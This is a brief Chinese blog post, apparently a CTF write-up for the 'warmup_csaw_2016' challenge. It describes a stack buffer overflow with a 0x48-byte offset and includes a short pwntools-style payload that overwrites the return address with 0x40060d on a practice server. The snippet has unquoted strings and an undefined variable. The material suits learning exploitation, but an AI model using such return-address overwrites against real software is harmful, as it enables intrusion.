首页 > 其他 > 详细

warmup_csaw_2016

时间:2020-06-17 10:55:09      阅读:73      评论:0      收藏:0      [点我收藏+]

题目只是简单的栈溢出,而且给了明确的system函数位置,所以直接覆盖过去就ok。

技术分享图片

 

 

v5大小是 0x40, 返回地址是8 字节, 溢出大小就是0x48 ,然后构造pyaload的时候加上sub_40060D就拿到flag:

payload:

remote(node3.buuoj.cn,29612)
addr=0x40060d
payload=a*72+p64(addr)
p.sendline(payload)
p.interactive()

技术分享图片

 

warmup_csaw_2016

原文:https://www.cnblogs.com/jentleTao/p/13150531.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!